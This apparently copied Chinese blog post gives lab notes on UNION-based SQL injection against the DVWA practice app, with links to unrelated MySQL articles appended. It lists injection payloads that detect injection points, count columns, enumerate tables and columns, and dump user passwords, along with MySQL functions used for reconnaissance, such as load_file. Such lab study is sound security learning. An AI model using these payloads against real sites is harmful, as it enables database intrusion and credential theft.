DVWA SQL注入union

时间：2024-11-12 22:30:03浏览次数：1

标签：group name union DVWA select SQL id concat

数字型注入

1 and 1=1
1 and 1=2
返回数据不一样则有注入点且为数字型注入

//判断列数
?id=and 1 order by 6 //返回正确
?id=and 1 order by 7 //返回错误
得到列数为6
查数据库：1 and 1=2 union select 1,database()

字符型注入

'and 1=1 and'1'='1
'and 1=2 and'1'='1
?id=and 1 order by 6# //返回正确
?id=and 1 order by 7# //返回错误
得到列数为6

查数据库:0' union select 1,database()#

查表名：-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

查字段名：0' union select 1,group_concat(column_name) from information_schema.columns where table_name="users" #

	group_concat(column_name) 可替换为  unhex(Hex(cast(column_name+as+char)))column_name

查数据：0' union select 1,group_concat(password) from users #

group_concat 可替换为 concat_ws(',',id,users,password )

查数据：0' union select 1,password from users limit 0,1# //只查一行

version():查询数据库的版本
user():查询数据库的使用者
database():数据库
system_user():系统用户名
session_user():连接数据库的用户名
current_user:当前用户名
load_file:读取本地文件
@@datadir:读取数据库路径
@@basedir:mysql安装路径
@@version_complie_os:查看操作系统

标签：group,name,union,DVWA,select,SQL,id,concat
From： https://www.cnblogs.com/mhwq/p/18542801

基于Java+SpringBoot+Mysql在线课程学习教育系统功能设计与实现五
一、前言介绍：免费获取：猿来入此1.1项目摘要随着信息技术的飞速发展和互联网的普及，教育领域正经历着深刻的变革。传统的面对面教学模式逐渐受到挑战，而在线课程学习教育系统作为一种新兴的教育形式，正逐渐受到广泛关注和应用。在线课程学习教育系统的出现，不仅为学生提供了更加灵......
基于Java+SpringBoot+Mysql在线课程学习教育系统功能设计与实现六
一、前言介绍：免费获取：猿来入此1.1项目摘要随着信息技术的飞速发展和互联网的普及，教育领域正经历着深刻的变革。传统的面对面教学模式逐渐受到挑战，而在线课程学习教育系统作为一种新兴的教育形式，正逐渐受到广泛关注和应用。在线课程学习教育系统的出现，不仅为学生提供了更加灵......
Illegal mix of collations for operation 'UNION' 记录错误
24-11-12，在DVWA靶场练习回顾SQL注入union注入的时候突然发现，不管搞都报错！Illegalmixofcollationsforoperation'UNION'自己查了好久之后才发现是数据库编码不匹配的问题！！！union两端的字段的collatie（排序规则）不同参考：https://blog.csdn.net/qq_43665434/article/details/......
25. 使用MySQL之使用触发器
1.触发器MySQL语句在需要时被执行，存储过程也是如此。但是，如果你想要某条语句（或某些语句）在事件发生时自动执行，怎么办呢？例如：每当增加一个顾客到某个数据库表时，都检查其电话号码格式是否正确，州的缩写是否为大写；每当订购一个产品时，都从库存数量中减去订购的数量；无论何时删......
Mysql表分区实操
创建分区表createtableuser(idint(11)notnull,namevarchar(32)notnull)partitionbyrange(id)(partitionp0valueslessthan(10),partitionp1valueslessthan(20),partitionp2valueslessthan(30),partitionp3valueslessthanmaxvalue)分区表数据......
学会这7种SQL进阶用法，让你少走99%的弯路!
合集-Mysql(4) 1.面试官：Mysql千万级大表如何进行深度分页优化？02-012.解锁Mysql中的JSON数据类型，怎一个爽字了得02-203.学会这7种SQL进阶用法，让你少走99%的弯路!03-084.美团二面：如何保证Redis与Mysql双写一致性？连续两个面试问到了！04-16收起引言在日常业务开发......
[20241110]使用xto10.sql脚本遇到的问题.txt
[20241110]使用xto10.sql脚本遇到的问题.txt--//自己在使用xto10.sql脚本时，输入参数错误，我没有想到竟然执行有结果，例子：SYS@book>@xto10d5f8b30410BASE10 BASE10----------------------------------------------------------......
Mysql大表处理方案：分区详解
前言在我们日常处理海量数据的过程中，如何有效管理和优化数据库一直是一个既重要又具有挑战性的问题，较为通用的做法就是分区、分表、分库了。那我们应该如何选择这几种方式呢？下面本人记录以下几种方式的优劣，希望能够帮助到大家。首先分区:数据库中分区是将表或索引的数据划分成......
mysql修改/删除
mysql增删改查中的改使用update表名set列名条件where； matched是当前表有几行，changed是执行了几行，warnings是警告删除deleteform表名where条件；删除表里的某行信息 deletefrom表名；是删除整张表数据 ......
DVWA靶场练习一Brute Force
1、安装Phpstudy环境搭建下载链接https://wwig.lanzoue.com/iIN142esjiob密码:4zuzDVWA靶场文件下载链接:https://wwig.lanzoue.com/iMr9u2esjire密码:49ag文件下载好后开始搭建1.1小皮面板打开小皮点击一键启动WNMP启动数据库和nginx1.2文件修改点击管理找到最下......

DVWA SQL注入union

相关文章

赞助商

阅读排行